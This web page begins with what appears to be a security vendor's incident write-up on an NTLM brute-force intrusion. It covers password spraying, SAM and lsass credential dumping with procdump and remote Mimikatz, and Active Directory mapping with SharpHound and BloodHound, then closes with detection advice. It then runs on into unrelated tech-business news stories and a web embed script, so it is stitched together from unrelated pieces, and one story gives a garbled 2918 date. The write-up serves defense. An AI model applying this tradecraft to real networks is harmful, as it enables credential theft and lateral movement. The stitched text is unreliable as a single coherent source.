Deep Dive: Exploring an NTLM Brute Force Attack with Bloodhound

In this post, we describe how our Vigilance MDR team investigated a classic NTLM brute force attack, which has become a very common type of attack against our customers in the last few weeks. Following the attacker’s steps, we will cover the following topics:

  • Attack vector via NTLM Brute Forcing
  • Multiple credentials dumping techniques 
  • SharpHound – an active directory collector tool
  • The Detection

Our threat researchers have encountered a large number of lateral movement detections that were identified by SentinelOne as NTLM Brute Force attacks. As can be seen in the image below, there were a total of 2,481 detections that hit hundreds of machines. We can also see that based on the credentials dumping and PowerShell post-exploitation, we have mapped these indicators to MITRE IDs: T1003, T1064 and T1086.

We begin with taking initial mitigation steps:

  • Disconnecting the machine from the network
  • Issuing, by one click, the Remediate command that kills and quarantines the malicious group as well as remove any files and persistence that were created
  • Blacklisting and blocking any IOCs we find

Then we start to conduct a deep analysis of this attack. We can see that the victim machine is a Data Center server that was targeted from an internal machine which was not protected by the SentinelOne product; therefore, we couldn’t identify how the attacker first got into the customer’s network.

So what is NTLM?

NTLM stands for “New Technology LAN Manager” and is proprietary to Microsoft as an authentication protocol. It uses an encrypted challenge/response protocol in order to authenticate a user, without sending its password over the network. 

Although the word “new” is no longer relevant in the year 2020, as this protocol is very old and there are new and better authentication protocols that have already been developed, NTLM is still here and in use. Let’s take a look at how it works.

  1. User logs in with its credentials
  2. User’s credentials are calculated with the Hash algorithm
  3. Hash is stored in the machine’s account database: Security Account Manager (SAM)
  4. The user sends a connection request to the server
  5. The server generates a random Challenge and sends to the user
  6. User’s machine encrypts the random Challenge with the password hash
  7. The server encrypts the Challenge with the password hash as well
  8. The server validates the encrypted Challenge was created by the user, by comparing the responses

When Do Organizations Use It?

NTLM is usually used by organizations when:

  • There is no Kerberos trust between two different forests
  • At least the client or the server is not in the same domain
  • The authentication between client and server is attempted by IP
  • The organizational firewall is blocking Kerberos ports

Why Is NTLM Still In Use?

Although there are two NTLM versions, they are both weak and have vulnerabilities. 

Since NTLMv1 hashes are not salted and always have the same length, with modern processor power it takes just a few seconds to crack such hashes.

The NTLMv2 was intended as a cryptographically strengthened replacement for NTLMv1 since it uses salted hash and variable length. However, before the client sends the salted hash to the server it’s saved unsalted in the client’s memory, which exposes the password to offline cracking when responding to the challenge.

While there are better authentication protocols such as Kerberos that provide several advantages over NTLM, as we can see, organizations are still using the NTLM protocol.

The main reasons are:

  • Since NTLM is a legacy protocol, organizations fear to break legacy applications such as printers, file servers, etc, without causing damage to production.
  • Organizations have to determine and map each machine that needs to use this protocol then figure out how to move from NTLM usage to a more secure authentication protocol such as Kerberos.

What Are the Signs of an NTLM Brute Force Attack?

One or more of the following activities should appear on your network when an NTLM Brute Force attack is taking place:

  • Multiple accounts with lockouts after the attacker made too many attempts
  • A single source machine conduct password spraying over multiple machines
  • Uses of the NTLM protocol with account enumeration

Back to our analysis, by examining our internal log files we can clearly see account enumeration from a single unprotected source machine that does password spraying.

Once the attacker had brute-forced the Data Center server successfully, he continued credential dumping by querying the Windows Syskeys using RegOpenKeyEx/RegQueryInfoKey API calls as well as saving the SAM database. As we know, the SAM database contains encrypted usernames and passwords locally on the machine they were created on so saving the database has value to the attacker.

This activity can be seen in our Active EDR DeepVisibility, which mapped these detections to MITRE technique:

The next step for the attacker was to create cmd.exe and execute powershell.exe with the following obfuscated code:

Looking at the second line of this obfuscated code, we can see the attacker used -join char[] in order to convert the ASCII values to strings. 

Let’s write a few lines to decode this obfuscated code:

Analyzing the output source code, we can see the attacker stored a Mimikatz Powershell file remotely on the source unprotected machine, then invoked it in order to dump credentials without ever writing the Mimikatz binary to the victim’s machine.

Empire & Mimikatz Detection Demo
By Ryan Merrick – Sr. Strategic Engineer – SentinelOne

A few minutes later, we identified another detection which revealed the attacker’s next move. This involved dropping and executing two other executables: SharpHound.exe and Procdump64.exe

Let’s cover each node’s command line.

First, the attacker executed whoami in order to the get login information, as well as procdump64.exe in order to dump the lsass.exe.

Executing procdump64.exe is a good example of how attackers use Living Off the Land tactics, since such processes are signed, known and verified (in our case by Microsoft).

That way attackers hope they can hide their malicious activity in an ocean of legit processes, as well as making it hard for security researchers to determine who is the group behind such an attack.

Second, the next executable in this malicious group is SharpHound.exe, which was executed with the following commands:

Interlude: A Quick Refresher on SharpHound

Before we continue analysing the attack, let’s take a quick look at SharpHound in order to understand the attacker’s tactics better. SharpHound is the executable version of BloodHound and provides a snapshot of the current active directory state by visualizing its entities.

This tool helps both defenders and attackers to easily identify correlations between users, machines, and groups. Additionally, this tool:

  • Collects Active sessions 
  • Collects Active Directory permissions
  • Maps the shortest path to Domain Admins
  • Looks for hidden correlations 

Importantly, even a user with regular permissions can use this tool.

Gathering Data and Lateral Movement

Back to our analysis, the attacker dropped the SharpHound tool then started collecting data by executing the command: -C All.

This command runs an ingester on the victim’s machine that queries the active directory. Once done, the following compressed file has been created:

The compressed file contains JSON files with the relevant collected active directory information:

The attacker then uploads the compressed dataset into a Neo4j server, which imports these JSON files and after processing them, shows the graph theory.

Now, we don’t know what kind of snapshot the attacker has had from the victim’s Data Center server; however, we did find this tool to be very interesting, so we will write a quick introduction covering the features we have tested in our malware lab.

Once the Neo4j server is up and the JSON files have been successfully imported, we get a small GUI that gives us the ability to search for any node in our theory graph as well as three tabs:  Database Info, Node Info, and Queries.

The Database Info tab shows in numbers an overview on our active directory, such as: 

  • How many users are there? 
  • How many active sessions are there for these users? 
  • How many groups are there? 
  • How many relationships are there between our nodes etc.

The theory graph shows all the relations from a given machine node, as shown below. 

For example:

  • Yellow nodes: represent the groups [right-click to expand and see members]
  • Green nodes: represent the users
  • Red nodes: represent active machine’s sessions
  • MemberOf edge: represents the users that are members of the connected Groups node
  • AdminTo edge: represents a group that have admin privileges on the particular connected machine node

Note: Bloodhound only provides a snapshot of the current state of the domain, meaning if you are analyzing a graph and find access to a particular entity, it doesn’t mean this session is still active.

The Queries tab contains predefined queries such as:

  • Find all Domain Admins: Finds all the Domain Admins relations from your current node
  • Map Domain Trust: Shows if your current domain has a relationship with other domains 
  • Shortest Paths to High-Value Targets: Shows you the shortest paths to the Domain Admins, Administrators, etc. (Right-click a node to set this machine as a High-Value Target)

The Node Info tab shows us information regarding our current node: 

  • Last time that the password was changed (old timestamp could indicate a weak password)
  • There are 3 active sessions from our current machine
  • There are 30 relationships with High-Value Target machines 
  • First Degree Group Memberships indicates that this node is a member of 3 different groups
  • We have direct RDP connections to 3 machines

We can also try finding a path from our current machine to any target machine we want:

All these BloodHound features show how the attacker leveraged this tool’s abilities to move laterally in the network using RDP from its current Data Center node, tried reaching high-value targets such as Group Admins, Administrators users and probably the main high-value target will be the Domain Controller server. 

How Can We Detect BloodHound Traffic?

To identify usage of BloodHound in your environment, monitor network traffic between your endpoints to your Domain Controller, which will mostly be over TCP port 389 (LDAP).

Another indicator can be by identifying a high amount of queries to the active directory server as well.

Conclusions

As can be seen, an NTLM brute force attack is still a serious concern for all environments especially when combining multiple credential dumping techniques and dropping a tool that creates a snapshot of your current active directory state.

As always, ensure your SOC team monitors such NTLM activity as well as suspicious network traffic to the active directory server, as we have shown in this post.

Additionally, it’s essential to deploy a modern and capable endpoint security solution. For threat hunters and SOC teams using SentinelOne, they can detect such activity by using Watch lists in our Active EDR DeepVisibility. For example, if we want to detect Windows Syskeys events, we can simply create a Watch list that matches a behavioral indicator related to “accessing the Windows Syskeys”. Once such events appear over your network, the Watch list will automatically send you an email with the detection URL.

The SentinelOne agent also prevents aggressive payloads such as Mimikatz touching the lsass process, and teams can mitigate and remediate any malicious group with just one click in the Management console.

Last but not least, our Vigilance MDR team provides a 24/7 Managed Detection and Response service to SentinelOne’s VIP customers. This detection is just one example out of thousands of threats we handle every day. If you are not yet a SentinelOne customer, contact us to find out more about how we can protect your business or try a free demo.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Google is making Meet free for everyone

Google today announced that it is making Meet, its video meeting tool for businesses that directly competes with the likes of Zoom, available for free to everyone. Until now, you could participate in a Meet call without being a paying user, but you needed a paid G Suite account to start calls.

You won’t be able to schedule free Meet calls right away, though. Google is opening up access to Meet to free users gradually, starting next week. It may take a few weeks before everybody has access to it.

After September, free accounts will be limited to meetings that don’t run longer than 60 minutes, but until then, you can chat for as long as you want. The only other real limit is that meetings can’t have more than 100 participants. You still get screen sharing, real-time captions and the new tiled layout the company introduced only a few days ago.

Users will need a Google account to participate in meetings, though, which isn’t likely to be a major barrier for most people, but it does add more friction than simply clicking on a Zoom link.

Google argues that in return, you get a safer platform, not just because it’s hard to guess meeting codes for Meet (which makes “Meet-bombing” a non-starter), but also because Meet runs in the browser and is hence less vulnerable to security threats.

“With COVID, video conferencing is really becoming an essential service and we have seen video conferencing usage really go up,” Smita Hashim, the Director of Product Management at Google Cloud, told me. Because the need for these tools continues to increase, Google decided to bring Meet to individual users now, though Hashim noted that some of this had been on the company’s roadmap before.

“We are accelerating what we are doing, given the crisis and given the need for video conferencing at this point,” she said. “We still have the Google Hangouts product but Google Meet availability we are accelerating. This is a newer product designed to scale to many more participants and that has features like closed captioning and those kinds of things.”

So for the time being, Hangouts for consumers and also Google Duo aren’t going away. But at least for consumer Hangouts, which has been on life support for a long time, this move may accelerate its deprecation.

Clearly, Google saw that Zoom caught on among consumers and that Microsoft announced plans for a consumer edition of Teams. Without a free and easily accessible version of Meet, Google wasn’t able to fully capitalize on what has become a breakout time for video conferencing tools, so it makes sense for the company to make a push to get this new edition out of the door as fast as possible.

“From a leadership perspective, the message was really: how can Google be more and more helpful,” Hashim said when I asked her what the discussion about this move was like inside the company. “That was the direction we got. So from our side, video conferencing is the product which is really hugely accelerated usage and Google Meet in particular. So that’s why we first launched the advanced features, then we did the safety controls and then we said, ‘okay, let’s accelerate some of these other features,’ but we kept seeing that need, so it felt like a very natural next step for us to take and make it available to all our users.”

In addition to free access to Google Meet for everyone, Google is also launching a new edition of G Suite, dubbed G Suite Essentials. This new edition, which is meant for small teams and includes access to Google Drive, Docs, Sheet, Slides and, of course, Meet, will be available for free until September 30. After that, Google will start charging, but as Hashim told me, the company hasn’t decided on pricing yet.

For enterprise users, Google is also adding a few perks through September 30. These include free access to advanced Meet features for all G Suite customers, including the ability to live stream to up to 100,000 viewers within their domains, as well as free additional Meet licenses without the need for an amended contract, and free G Suite Essentials for enterprise customers.

Google also used today’s announcement to share a few new stats around Meet. As of last week, Meet’s daily meeting participants surpassed 100 million, for example, and with that, Meet now plays host to 3 billion minutes of video meetings. Daily peak usage is up 30x since January. That’s a lot of time spent in meetings.

Puppet names former Cloud Foundry Foundation executive director Abby Kearns as CTO

Puppet, the Portland-based infrastructure automation company, today announced that it has named former Cloud Foundry Foundation executive director Abby Kearns as its new CTO.

Current Puppet CTO Deepak Giridharagopal will remain in his role and focus on R&D and leading new projects, while Kearns will focus on expanding the company’s product portfolio and communicating with enterprise audiences.

Kearns stepped down from her role at the Cloud Foundry Foundation earlier this month after holding that position since 2016. At the time, she wasn’t quite ready to reveal her next move, though, and her taking the CTO job at Puppet comes as a bit of a surprise. Despite a lot of usage and hype in its early days, Puppet isn’t often seen as an up-and-coming company anymore, after all. But Kearns argues that a lot of this is due to perception.

“Puppet had great technology and really drove the early DevOps movement, but they kind of fell off the face of the map,” she said. “Nobody thought of them as anything other than config management, and so I was like, well, you know, problem number one: fix that perception problem if that’s no longer the reality or otherwise, everyone thinks you’re dead.”

Since Kearns had already started talking to Puppet CEO Yvonne Wassenaar, who took the job in January 2019, she joined the product advisory board about a year ago and the discussion about Kearns joining the company became serious a few months later.

“We started talking earlier this year,” said Kearns. “She said: ‘You know, wouldn’t it be great if you could come help us? I’m building out a brand new executive team. We’re really trying to reshape the company.’ And I got really excited about the team that she built. She’s got a really fantastic new leadership team, all of them are there for less than a year. they have a new CRO, new CMO. She’s really assembled a fantastic team of people that are super smart, but also really thoughtful people.”

Kearns argues that Puppet’s product has really changed, but that the company didn’t really talk about it enough, despite the fact that 80% of the Global 5,000 are customers.

Given the COVID-19 pandemic, Kearns has obviously not been able to meet the Puppet team yet, but she told me that she’s starting to dig deeper into the company’s product portfolio and put together a strategy. “There’s just such an immensely talented team here. And I realize every startup tells you that, but really, there’s actually a lot of talented people here that are really nice. And I guess maybe it’s the Portland in them, but everyone’s nice,” she said.

“Abby is keenly aware of Puppet’s mission, having served on our Product Advisory Board for the last year, and is a technologist at heart,” said Wassenaar. “She brings a great balance to this position for us – she has deep experience in the enterprise and understands how to solve problems at massive scale.”

In addition to Kearns, former Cloud Foundry Foundation VP of marketing Devin Davis also joined Puppet as the company’s VP of corporate marketing and communications.

Update: we updated the post to clarify that Deepak Giridharagopal will remain in his role.

Atlassian co-founder and co-CEO Mike Cannon-Brookes is coming to Disrupt SF 2020

Atlassian is about as ubiquitous to software engineers as Google is to the rest of us. The Sydney-based company, which launched in 2002, develops tools and services for enterprise collaboration and marched efficiently to a public offering in 2015.

So it goes without saying that we’re thrilled to have Atlassian co-founder and co-CEO Mike Cannon-Brookes join us at Disrupt SF 2020, which runs September 14 to September 16.

As far as entrepreneurship goes, Cannon-Brookes is on a very short list of founders who have led a company from founding to public offering, and all the steps in between.

Atlassian was one of the early players in enterprise collaboration, particularly for engineering and development teams, and has over the years introduced a robust product suite, including Jira, Confluence and HipChat.

Cannon-Brookes has been at the helm for the entire journey, from raising early funding to product development to acquisitions (including Trello) to public offering and beyond. All the while, Cannon-Brookes kept the company’s HQ, and all invoicing, in its home country of Australia, becoming the most successful tech startup to ever launch out of the nation down under.

One of the more interesting features of the company? Unlike Microsoft and IBM and other big enterprise software companies, Atlassian has always operated without a proper sales team, using a fraction of spend on sales and marketing compared to other enterprise software giants.

“We had a hunch early on that salespeople break software companies,” Cannon-Brookes told the Australian Financial Review in 2015. “But convincing people this model would work has probably been the biggest struggle we’ve had. We’ve had a lot of smart people who wouldn’t join the company or give us money or advise us because it made no sense to them.”

The company developed an enormously successful distribution flywheel built on the back of one necessary ingredient: remarkable products. Great products at low prices mean that you can sell to everyone, and if you sell to everyone you have to do it online and with transparent pricing and a great free trial. But if you offer a free trial, you better have a remarkable product, and the flywheel spins on and on.

It has worked.

Atlassian products are used by more than 160,000 large and small organizations across the globe, including Spotify, NASA, Sotheby’s and Visa.

Cannon-Brookes is also a tech investor across sectors like software, fintech, agriculture and energy, with a seat on the board of Zoox.

We’re excited to sit down with Cannon-Brookes and hear more about the company’s trajectory over the last two decades and hear what comes next for the behemoth.

Disrupt SF 2020 runs September 14 to September 16 at the Moscone Center right in the heart of San Francisco. For folks who can’t make it in person, we have several Digital Pass options to be part of the action or to exhibit virtually, which you can check out here.

We’ll be announcing more speakers over the coming weeks, so stay tuned.

(Editor’s Note: We’re watching the developing situation around the novel coronavirus very closely and will adapt as we go. You can find out the latest on our event schedule plans here.)

( function() {
var func = function() {
var iframe = document.getElementById(‘wpcom-iframe-9b499a6cf360908fb4ecffa7e6ecab7c’)
if ( iframe ) {
iframe.onload = function() {
iframe.contentWindow.postMessage( {
‘msg_type’: ‘poll_size’,
‘frame_id’: ‘wpcom-iframe-9b499a6cf360908fb4ecffa7e6ecab7c’
}, “https://tcprotectedembed.com” );
}
}

// Autosize iframe
var funcSizeResponse = function( e ) {

var origin = document.createElement( ‘a’ );
origin.href = e.origin;

// Verify message origin
if ( ‘tcprotectedembed.com’ !== origin.host )
return;

// Verify message is in a format we expect
if ( ‘object’ !== typeof e.data || undefined === e.data.msg_type )
return;

switch ( e.data.msg_type ) {
case ‘poll_size:response’:
var iframe = document.getElementById( e.data._request.frame_id );

if ( iframe && ” === iframe.width )
iframe.width = ‘100%’;
if ( iframe && ” === iframe.height )
iframe.height = parseInt( e.data.height );

return;
default:
return;
}
}

if ( ‘function’ === typeof window.addEventListener ) {
window.addEventListener( ‘message’, funcSizeResponse, false );
} else if ( ‘function’ === typeof window.attachEvent ) {
window.attachEvent( ‘onmessage’, funcSizeResponse );
}
}
if (document.readyState === ‘complete’) { func.apply(); /* compat for infinite scroll */ }
else if ( document.addEventListener ) { document.addEventListener( ‘DOMContentLoaded’, func, false ); }
else if ( document.attachEvent ) { document.attachEvent( ‘onreadystatechange’, func ); }
} )();

SkyCell raises $62M for smart containers and analytics to transport pharmaceuticals

While human travel has become severely restricted in recent months, the movement of goods has remained a constant priority — and in some cases, has become even more urgent. Today, a startup out of Switzerland that builds hardware and operates a logistics network designed to transport one item in particular — pharmaceuticals — is announcing a significant round to fuel its growth.

SkyCell — a designer of “smart containers” powered by software to maintain constant conditions for drugs that need to be kept at strict temperatures, humidity levels, and levels of vibration, which are in turn used to transport pharmaceuticals around the globe on behalf of drug companies — is today announcing. that it has raised $62 million in growth funding.

This latest round is being led by healthcare investor MVM Partners, with participation also from family offices, a Swiss insurance company that declined to be named, as well as previous investors the Swiss Entrepreneurs Fund (managed by Credit Suisse and UBS), and the BCGE Bank’s growth fund.

The company was founded in 2012 Switzerland when Richard Ettl and Nico Ros were tasked to design a storage facility for one of the big Swiss pharma giants. The exec charged with overseeing the project brainstormed that the work they were putting in could potentially be applied to transportation containers, and thus SkyCell was born.

Today, Ettl (who is the CEO, while Ros is the CTO), said in an interview that the company now works with eight of the world’s biggest pharmaceutical companies and has been in validation trials with a further seven. These use SkyCell’s network of some 22,000 air freight pallets to move their products around the world.

The new capital will be used to expand that reach further, specifically in the U.S. and Asia, and to double its fleet to become the biggest pharmaceutical transportation company globally. With 30 of the 50 biggest-selling drugs in the world being temperature sensitive (and some generics for one of the biggest-selling, the arthritis medication Humira, now also coming out), this makes for a huge opportunity.

And unsurprisingly, several of SkyCell’s customers are working on COVID-19 medications, Ettl said, either to help ease symptoms or potentially to vaccinate or eradicate the virus, and so it’s standing at the ready to play a role in getting drugs to where they need to be.

“We are well positioned in case there is a vaccine developed. Out of the six pharma companies developing these right now, four of them are our customers, so there is a high likelihood we would transport something,” Ettl said.

For now, he said SkyCell has been involved in helping to transport “supportive” medications related to the outbreak, such as flu shots to make sure people are not falling ill with other viral infections at the same time.

SkyCell is not disclosing its valuation but we understand that it’s in the many hundreds of millions of dollars. The company had raised some $36 million in equity and debt before this, bringing the total outside funding now to $98 million.

In a market that’s estimated to be worth some $2.8 billion annually and growing at a rate of between 15% and 20% each year, there are a number of freight businesses that focus on the transportation of pharmaceuticals. They include not only freight companies but airlines themselves, which often buy in containers from third parties. (And for some more context, one of its competitors, Envirotainer, was acquired for over $1 billion in 2918; while another, CSafe, has raised significantly more funding.)

But there was virtually no innovation in the market, and most pharmaceutical companies factored in failure rates of between 4% and 12% depending on where the drugs were headed.

One key differentiator with SkyCell has been its containers, which are able to withstand temperatures as high as 60 degrees Celsius or as low as negative 10 degrees Celsius, and have tracking on them to better monitor their movements from A to B.

These came to the market at a time when incumbents were only able to (and some still are only able to) guarantee insulation for temperatures as high as 40 degrees, which was not as pressing an issue in the past as it is today, in part because of rising temperatures around the globe, and in part because of the growing sophistication of pharmaceuticals.

“We’ve found that the number of days where [one has to consider] temperature extremes has been going up,” Ettl said. “Last year, we had 30 days where it was warmer than 40 degrees Celsius across our network of countries.”

On top of the containers themselves, SkyCell has built a software platform that taps into the kind of big data analytics that are now part and parcel of how modern companies in the logistics industry work today, in order to optimise movement and best routing for packages.

The conditions it considers include not only the obvious ones around temperature, humidity and vibration, but distance and time of travel, as well as overall carbon emissions. SkyCell claims that its failure rate comes out at less than 0.1%, with CO2 emissions reduced by almost half on a typical shipment.

Together, the hardware and software are covered by some 100 patents, the company says.

Checkly raises $2.25M seed round for its monitoring and testing platform

Checkly, a Berlin-based startup that is developing a monitoring and testing platform for DevOps teams, today announced that it has raised a $2.25 million seed round led by Accel. A number of angel investors, including Instana CEO Mirko Novakovic, Zeit CEO Guillermo Rauch and former Twilio CTO Ott Kaukver, also participated in this round.

The company’s SaaS platform allows developers to monitor their API endpoints and web apps — and it obviously alerts you when something goes awry. The transaction monitoring tool makes it easy to regularly test interactions with front-end websites without having to actually write any code. The test software is based on Google’s open-source Puppeteer framework and to build its commercial platform, Checkly also developed Puppeteer Recorder for creating these end-to-end testing scripts in a low-code tool that developers access through a Chrome extension.

The team believes that it’s the combination of end-to-end testing and active monitoring, as well as its focus on modern DevOps teams, that makes Checkly stand out in what is already a pretty crowded market for monitoring tools.

“As a customer in the monitoring market, I thought it had long been stuck in the 90s and I needed a tool that could support teams in JavaScript and work for all the different roles within a DevOps team. I set out to build it, quickly realizing that testing was equally important to address,” said Tim Nolet, who founded the company in 2018. “At Checkly, we’ve created a market-defining tool that our customers have been demanding, and we’ve already seen strong traction through word of mouth. We’re delighted to partner with Accel on building out our vision to become the active reliability platform for DevOps teams.”

Nolet’s co-founders are Hannes Lenke, who founded TestObject (which was later acquired by Sauce Labs), and Timo Euteneuer, who was previously Director Sales EMEA at Sauce Labs.

Tthe company says that it currently has about 125 paying customers who run about 1 million checks per day on its platform. Pricing for its services starts at $7 per month for individual developers, with plans for small teams starting at $29 per month.

Tecton.ai emerges from stealth with $20M Series A to build machine learning platform

Three former Uber engineers, who helped build the company’s Michelangelo machine learning platform, left the company last year to form Tecton.ai and build an operational machine learning platform for everyone else. Today the company announced a $20 million Series A from a couple of high-profile investors.

Andreessen Horowitz and Sequoia Capital co-led the round with Martin Casado, general partner at a16z and Matt Miller, partner at Sequoia joining the company board under the terms of the agreement. Today’s investment combined with the seed they used to spend the last year building the product comes to $25 million. Not bad in today’s environment.

But when you have the pedigree of these three founders — CEO Mike Del Balso, CTO Kevin Stumpf and VP of Engineering Jeremy Hermann all helped build the Uber system —  investors will spend some money, especially when you are trying to solve a difficult problem around machine learning.

The Michelangelo system was the machine learning platform at Uber that looked at things like driver safety, estimated arrival time and fraud detection, among other things. The three founders wanted to take what they had learned at Uber and put it to work for companies struggling with machine learning.

“What Tecton is really about is helping organizations make it really easy to build production-level machine learning systems, and put them in production and operate them correctly. And we focus on the data layer of machine learning,” CEO Del Balso told TechCrunch.

Image Credit: Tecton.ai

Del Balso says part of the problem, even for companies that are machine learning-savvy, is building and reusing models across different use cases. In fact, he says the vast majority of machine learning projects out there are failing, and Tecton wanted to give these companies the tools to change that.

The company has come up with a solution to make it much easier to create a model and put it to work by connecting to data sources, making it easier to reuse the data and the models across related use cases. “We’re focused on the data tasks related to machine learning, and all the data pipelines that are related to power those models,” Del Balso said.

Certainly Martin Casado from a16z sees a problem in search of a solution and he likes the background of this team and its understanding of building a system like this at scale. “After tracking a number of deep engagements with top ML teams and their interest in what Tecton was building, we invested in Tecton’s A alongside Sequoia. We strongly believe that these systems will continue to increasingly rely on data and ML models, and an entirely new tool chain is needed to aid in developing them…,” he wrote in a blog post announcing the funding.

The company currently has 17 employees and is looking to hire, particularly data scientists and machine learning engineers, with a goal of 30 employees by the end of the year.

While Del Balso is certainly cognizant of the current economic situation, he believes he can still build this company because he’s solving a problem that people genuinely are looking for help with right now around machine learning.

“From the customers we’re talking to, they need to solve these problems, and so we don’t see things slowing down,” he said.

Celonis pushes beyond process mining into automated workflow tooling

Celonis has made its name as a process discovery company, helping companies understand the way work flows through its systems to expose inefficiencies, but up until now the company has left it to others to solve those problems. Today it announced the first products that help companies improve those workflows automatically.

Alexander Rinke, founder and CEO at Celonis, says customers have been asking the company to go beyond process discovery to something that really helps solve the problems and bottlenecks they were finding.

“Where customers were really pushing us is to take the company from a software that’s showing you all the insights around your business processes, where the friction points are, where things aren’t going as they should be going…” he told TechCrunch.

To that end, the company acquired Banyas last year to give it a way to connect to internal ERP systems more easily, as they were thinking about how to create some process improvement automation apps. The Banyas acquisition gave the company some tools to start thinking about this more deeply.

“We put all of this together — the intelligence, the action, the automation and we solve business goals for certain departments,” Rinke said.

For starters, that involves supply chain and finance, but there are plans for building even more applications this year and beyond. The way it works for starters, is it connects to the company’s transactions systems, whether that’s SAP or Oracle or something similar. This is where the Banyas acquisition really comes into play,

“You can basically put these applications on top of your transaction systems and tell them which business goals you have — like I want to preserve cash or I want to pay on time — and then we analyze the enterprise’s entire processes towards these business goals, and then drive everything, automate things towards these business goals intelligently,” he said.

In addition to the two apps, the company is also announcing that it’s making the platform that the engineering team used to build these apps more broadly available to allow third parties to build their own apps on top of Celonis, and then they will be able to share them in an app marketplace.

If you’re thinking this is moving Celonis into Robotic Process Automation (RPA), Rinke disagrees As he sees it, RPA is about automating all-computer processes. He says the Celonis solutions often have human stopping points in a process, and he sees that as a big difference.

Celonis was founded in 2011 and has raised more than $367 million, according to Crunchbase data. Rinke reports the company has more than 1000 employees now.

In surprise choice, Zoom hitches wagon to Oracle for growing infrastructure needs

With the company growing in leaps and bounds, Zoom went shopping for a cloud infrastructure vendor to help it with its growing scale problem. In a surprising choice, the company went with Oracle Cloud Infrastructure.

Zoom has become the go-to video conferencing service as much of the world has shut down due to the pandemic, and life needs to go on somehow. It has gone on via video conferencing with Zoom growing from 200 million active users in February to 300 million in March. That kind of growth puts a wee bit of pressure on your infrastructure, and Zoom clearly needed to beef up its game.

What’s surprising is that it chose Oracle, a company whose infrastructure market share registers as a strong niche player in Synergy Research’s latest survey in February. It is well behind market leaders including Amazon, Microsoft, Google, and even IBM (and that’s saying something).

Brent Leary, who is founder at CRM Essentials, says he sees this as a move to show that Zoom can move beyond the SMB market to power enterprise customers, no matter what they demand.

“I think Zoom went with Oracle because they are proven in the enterprise in terms of mission critical apps built on Oracle databases running on Oracle hardware in the cloud. Zoom needs to prove to enterprises that they are able to handle scale and data security needed to beyond what SMBs typically require,” Leary told TechCrunch.

In addition, Leary speculated that Oracle might have given Zoom a good deal to get a hot company into the fold and beat rivals like Amazon and Microsoft.

It’s worth noting that CNBC reported a couple of weeks ago that Oracle chairman Larry Ellison called Zoom an “essential service” for his business, as well as others. It certainly seems in hindsight that was hardly a coincidence, as he was praising up his new prize customer.

Others have speculated that it might have to do with keeping business away from a potential rival given that Amazon with Chime, Google with Hangouts and Microsoft with Teams all have competing products. However, none of them have become synonymous with online meetings as Zoom has during this crisis.

Zoom went public last year and has become the darling of the video conference market since in spite of a set of security issues that have developed as the company scaled, which they have been working to address.

The stock market is apparently not impressed with the choice. As we went to publish, the stock was down 3.38% or $5.56.

Spark fast follows with a $25M Series B round into customer success platform Catalyst

The world has been turned upside down the past few weeks, but one lesson of business remains as important as ever: treating your customers well is the best avenue to future business strength, particularly at a moment of extreme stress.

As businesses come to terms with the economic crisis underway, executives are moving resources from customer acquisition to customer retention — and that’s proving very lucrative to startups that service the customer success market.

Case in point: New York City-based Catalyst, which I profiled just last summer following its $15 million Series A led by Accel’s Vas Natarajan, has seen huge revenue growth the past few months. The data-driven customer success platform has seen its revenue grow by 380% since the Series A financing according to CEO Edward Chiu.

Steep revenue growth is (unsurprisingly) attractive to investors, and in a moment of fortuitous timing, the company signed a $25 million Series B term sheet with Spark Capital just as the COVID-19 crisis was getting underway.

Chiu said Catalyst wasn’t seeking the investment, having much of its Accel round still in the bank, but he ultimately decided that having the extra capital in hand through a looming economic recession was the right decision. The capital officially hit the bank account at the end of March, and was led by the firm’s growth investor Will Reed.

While the company didn’t disclose the valuation, a source with knowledge of the matter quoted a valuation of $125 million. That’s a serious valuation for a company that launched just two years ago in April of 2018.

Outside of more funding, the core story of the company’s product remains the same. Catalyst wants to bring together all the data sources and team members who interact with customers — everyone from designers and engineers to customer success managers — into one dashboard to ensure that everyone has accurate and up-to-date access to all the information they need on the health of every customer.

The one airbrush: the company’s previous URL of getcatalyst.io has become catalyst.io, and officially re-launched this morning.

One growth area that the company is exploring outside of the B2B space of its existing customers is in healthcare, where the company has seen some inbound interest. Chiu says that Catalyst is exploring the steps required to reach HIPAA compliance with its platform, and hopes to expand to more sectors over time with the capital from its Series B.

The Catalyst team. Photo via Catalyst.

When we last checked in with the company, Catalyst had 19 employees and was targeting 40 employees by July 2020. Chiu said that Catalyst is already at 35 employees, and will likely hit 60 to 70 employees by the end of the year.